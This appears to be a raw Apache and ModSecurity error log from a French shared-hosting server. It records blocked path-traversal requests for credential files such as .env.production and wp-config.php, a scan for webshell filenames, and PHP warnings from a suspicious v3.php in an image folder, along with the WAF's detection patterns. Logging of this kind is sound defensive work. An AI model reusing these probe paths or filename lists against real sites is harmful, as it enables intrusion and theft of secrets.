[Tue May 12 05:10:37.567588 2026] [security2:error] [pid 1730207:tid 1730222] [client 45.148.10.246:3402] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /public../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/.env.production"] [unique_id "agKaLTue9Sp-pIv_Bb69NgAAAU0"]
[Tue May 12 05:10:37.567647 2026] [security2:error] [pid 1730207:tid 1730222] [client 45.148.10.246:3402] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/.env.production"] [unique_id "agKaLTue9Sp-pIv_Bb69NgAAAU0"]
[Tue May 12 05:10:37.567749 2026] [security2:error] [pid 1730207:tid 1730222] [client 45.148.10.246:3402] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/.env.production"] [unique_id "agKaLTue9Sp-pIv_Bb69NgAAAU0"]
[Tue May 12 05:10:37.567954 2026] [security2:error] [pid 1730207:tid 1730222] [client 45.148.10.246:3402] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/.env.production"] [unique_id "agKaLTue9Sp-pIv_Bb69NgAAAU0"]
[Tue May 12 05:10:37.588436 2026] [security2:error] [pid 1730207:tid 1730222] [client 45.148.10.246:3402] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /public../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/wp-config.php"] [unique_id "agKaLTue9Sp-pIv_Bb69NwAAAU0"]
[Tue May 12 05:10:37.588496 2026] [security2:error] [pid 1730207:tid 1730222] [client 45.148.10.246:3402] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ixinabourgoin.fr"] [uri "/wp-config.php"] [unique_id "agKaLTue9Sp-pIv_Bb69NwAAAU0"]
[Tue May 12 05:10:37.588599 2026] [security2:error] [pid 1730207:tid 1730222] [client 45.148.10.246:3402] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/wp-config.php"] [unique_id "agKaLTue9Sp-pIv_Bb69NwAAAU0"]
[Tue May 12 05:10:37.588784 2026] [security2:error] [pid 1730207:tid 1730222] [client 45.148.10.246:3402] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/wp-config.php"] [unique_id "agKaLTue9Sp-pIv_Bb69NwAAAU0"]
[Tue May 12 05:10:37.608054 2026] [security2:error] [pid 1730207:tid 1730222] [client 45.148.10.246:3402] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /public../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/app/etc/env.php"] [unique_id "agKaLTue9Sp-pIv_Bb69OAAAAU0"]
[Tue May 12 05:10:37.608188 2026] [security2:error] [pid 1730207:tid 1730222] [client 45.148.10.246:3402] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/app/etc/env.php"] [unique_id "agKaLTue9Sp-pIv_Bb69OAAAAU0"]
[Tue May 12 05:10:37.608369 2026] [security2:error] [pid 1730207:tid 1730222] [client 45.148.10.246:3402] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/app/etc/env.php"] [unique_id "agKaLTue9Sp-pIv_Bb69OAAAAU0"]
[Tue May 12 05:10:37.627852 2026] [security2:error] [pid 1730207:tid 1730222] [client 45.148.10.246:3402] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /public../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/settings.py"] [unique_id "agKaLTue9Sp-pIv_Bb69OQAAAU0"]
[Tue May 12 05:10:37.627993 2026] [security2:error] [pid 1730207:tid 1730222] [client 45.148.10.246:3402] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/settings.py"] [unique_id "agKaLTue9Sp-pIv_Bb69OQAAAU0"]
[Tue May 12 05:10:37.628181 2026] [security2:error] [pid 1730207:tid 1730222] [client 45.148.10.246:3402] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/settings.py"] [unique_id "agKaLTue9Sp-pIv_Bb69OQAAAU0"]
[Tue May 12 05:10:37.648786 2026] [security2:error] [pid 1730207:tid 1730222] [client 45.148.10.246:3402] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /public../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "ixinabourgoin.fr"] [uri "/config/database.yml"] [unique_id "agKaLTue9Sp-pIv_Bb69OgAAAU0"]
[Tue May 12 05:10:37.648934 2026] [security2:error] [pid 1730207:tid 1730222] [client 45.148.10.246:3402] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ixinabourgoin.fr"] [uri "/config/database.yml"] [unique_id "agKaLTue9Sp-pIv_Bb69OgAAAU0"]
[Tue May 12 05:10:37.649120 2026] [security2:error] [pid 1730207:tid 1730222] [client 45.148.10.246:3402] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "ixinabourgoin.fr"] [uri "/config/database.yml"] [unique_id "agKaLTue9Sp-pIv_Bb69OgAAAU0"]
[Tue May 12 05:10:47.468370 2026] [security2:error] [pid 1825179:tid 1825209] [client 170.106.180.139:37954] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/"] [unique_id "agKaN9r1yOh9TvizeziY-wAAAEs"]
[Tue May 12 05:10:52.551379 2026] [security2:error] [pid 1808852:tid 1808861] [client 170.106.180.139:42234] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/accommodation/lodge-caraibe/"] [unique_id "agKaPBfeipD4uoG21FoqPgAAAAY"], referer: https://rentparadise.fr/?post_type=mphb_room_type&p=5395
[Tue May 12 05:11:04.648855 2026] [:error] [pid 1730207:tid 1730230] [client 43.165.167.72:60458] File does not exist: /home/totalcloud/public_html/index.php
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174177/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174177/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174177/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174177/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2174177/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2174177/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 05:11:32.179912 2026] [security2:error] [pid 1730207:tid 1730222] [client 43.130.47.33:54004] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "of-crystal-lake.net"] [uri "/chiens.php"] [unique_id "agKaZDue9Sp-pIv_Bb69eAAAAU0"]
[Tue May 12 05:11:59.552500 2026] [:error] [pid 1808852:tid 1808871] [client 114.119.136.64:34029] File does not exist: /home/totalcloud/public_html/index.php, referer: https://totalcloud.fr/webshop/?language=spanish
[Tue May 12 05:13:00.225722 2026] [security2:error] [pid 1825287:tid 1825313] [client 45.79.152.14:23012] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "303"] [id "920280"] [rev "2"] [msg "Request Missing a Host Header"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/MISSING_HEADER_HOST"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "totalcloud.fr"] [uri "/"] [unique_id "agKavAgpmE1yW0glLdgoQwAAAMg"]
[Tue May 12 05:13:00.227129 2026] [autoindex:error] [pid 1825287:tid 1825313] [client 45.79.152.14:23012] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 05:13:01.127247 2026] [security2:error] [pid 1820198:tid 1820215] [client 101.32.49.171:35064] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "217.113.192.26"] [uri "/"] [unique_id "agKavc1tk6y7yBJLpJo0CwAAAI8"]
[Tue May 12 05:13:01.994082 2026] [security2:error] [pid 1820198:tid 1820216] [client 45.79.152.14:23062] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "303"] [id "920280"] [rev "2"] [msg "Request Missing a Host Header"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/MISSING_HEADER_HOST"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "totalcloud.fr"] [uri "/"] [unique_id "agKavc1tk6y7yBJLpJo0DAAAAJA"]
[Tue May 12 05:13:01.995361 2026] [autoindex:error] [pid 1820198:tid 1820216] [client 45.79.152.14:23062] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 05:13:19.857236 2026] [security2:error] [pid 1808852:tid 1808874] [client 216.73.216.110:37471] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".db"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "missmandarine.com"] [uri "/missmandarine.ch/learning/file/flash/1423751012/assets/fr/fiches/Thumbs.db"] [unique_id "agKazxfeipD4uoG21Foq7wAAABM"]
[Tue May 12 05:13:19.857581 2026] [security2:error] [pid 1808852:tid 1808874] [client 216.73.216.110:37471] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "missmandarine.com"] [uri "/missmandarine.ch/learning/file/flash/1423751012/assets/fr/fiches/Thumbs.db"] [unique_id "agKazxfeipD4uoG21Foq7wAAABM"]
[Tue May 12 05:13:19.946127 2026] [security2:error] [pid 1808852:tid 1808874] [client 216.73.216.110:37471] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agKazxfeipD4uoG21Foq7wAAABM"]
[Tue May 12 05:13:21.476873 2026] [security2:error] [pid 1825287:tid 1825324] [client 43.157.53.115:46740] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "krakoukas.com"] [uri "/category/informatique/protocole-informatique/p2p/"] [unique_id "agKa0QgpmE1yW0glLdgocQAAANM"]
[Tue May 12 05:13:28.796676 2026] [:error] [pid 1820198:tid 1820201] [client 4.193.137.131:19970] File does not exist: /home/cpcentre/public_html/wp-content/data.php
[Tue May 12 05:13:29.111477 2026] [:error] [pid 1820198:tid 1820201] [client 4.193.137.131:19970] File does not exist: /home/cpcentre/public_html/wp-includes/ms-load.php
[Tue May 12 05:13:29.766697 2026] [:error] [pid 1820198:tid 1820201] [client 4.193.137.131:19970] File does not exist: /home/cpcentre/public_html/text.php
[Tue May 12 05:13:29.933523 2026] [:error] [pid 1820198:tid 1820201] [client 4.193.137.131:19970] File does not exist: /home/cpcentre/public_html/wp-themes.php
[Tue May 12 05:13:30.091340 2026] [:error] [pid 1820198:tid 1820201] [client 4.193.137.131:19970] File does not exist: /home/cpcentre/public_html/eubrzjghnc.php
[Tue May 12 05:13:30.249207 2026] [:error] [pid 1820198:tid 1820201] [client 4.193.137.131:19970] File does not exist: /home/cpcentre/public_html/images.php
[Tue May 12 05:13:30.575100 2026] [:error] [pid 1820198:tid 1820201] [client 4.193.137.131:19970] File does not exist: /home/cpcentre/public_html/b0.php
[Tue May 12 05:13:30.761204 2026] [:error] [pid 1820198:tid 1820201] [client 4.193.137.131:19970] File does not exist: /home/cpcentre/public_html/gif.php
[Tue May 12 05:13:31.076353 2026] [:error] [pid 1820198:tid 1820201] [client 4.193.137.131:19970] File does not exist: /home/cpcentre/public_html/bgymj.php
[Tue May 12 05:13:31.234142 2026] [:error] [pid 1820198:tid 1820201] [client 4.193.137.131:19970] File does not exist: /home/cpcentre/public_html/03a005685d.php
[Tue May 12 05:13:31.419354 2026] [:error] [pid 1820198:tid 1820201] [client 4.193.137.131:19970] File does not exist: /home/cpcentre/public_html/wp-includes/login.php
[Tue May 12 05:13:32.051618 2026] [:error] [pid 1820198:tid 1820201] [client 4.193.137.131:19970] File does not exist: /home/cpcentre/public_html/alfanew2.php7
[Tue May 12 05:13:32.371443 2026] [:error] [pid 1820198:tid 1820201] [client 4.193.137.131:19970] File does not exist: /home/cpcentre/public_html/vuln.php
[Tue May 12 05:13:32.686753 2026] [:error] [pid 1820198:tid 1820201] [client 4.193.137.131:19970] File does not exist: /home/cpcentre/public_html/default.php
[Tue May 12 05:13:32.844314 2026] [:error] [pid 1820198:tid 1820201] [client 4.193.137.131:19970] File does not exist: /home/cpcentre/public_html/wp-sigunq.php
[Tue May 12 05:13:33.329542 2026] [:error] [pid 1820198:tid 1820201] [client 4.193.137.131:19970] File does not exist: /home/cpcentre/public_html/xleet.php
[Tue May 12 05:13:33.487201 2026] [:error] [pid 1820198:tid 1820201] [client 4.193.137.131:19970] File does not exist: /home/cpcentre/public_html/ayk.php
[Tue May 12 05:13:33.674920 2026] [:error] [pid 1820198:tid 1820201] [client 4.193.137.131:19970] File does not exist: /home/cpcentre/public_html/index1.php
[Tue May 12 05:13:34.148757 2026] [:error] [pid 1820198:tid 1820201] [client 4.193.137.131:19970] File does not exist: /home/cpcentre/public_html/mani.php
[Tue May 12 05:13:34.464966 2026] [:error] [pid 1820198:tid 1820201] [client 4.193.137.131:19970] File does not exist: /home/cpcentre/public_html/admin-post.php
[Tue May 12 05:13:34.622507 2026] [:error] [pid 1820198:tid 1820201] [client 4.193.137.131:19970] File does not exist: /home/cpcentre/public_html/01.php
[Tue May 12 05:13:34.780272 2026] [:error] [pid 1820198:tid 1820201] [client 4.193.137.131:19970] File does not exist: /home/cpcentre/public_html/pki-validation.php
[Tue May 12 05:13:34.937977 2026] [:error] [pid 1820198:tid 1820201] [client 4.193.137.131:19970] File does not exist: /home/cpcentre/public_html/wp-content/file.php
[Tue May 12 05:13:35.253813 2026] [:error] [pid 1820198:tid 1820201] [client 4.193.137.131:19970] File does not exist: /home/cpcentre/public_html/api.php
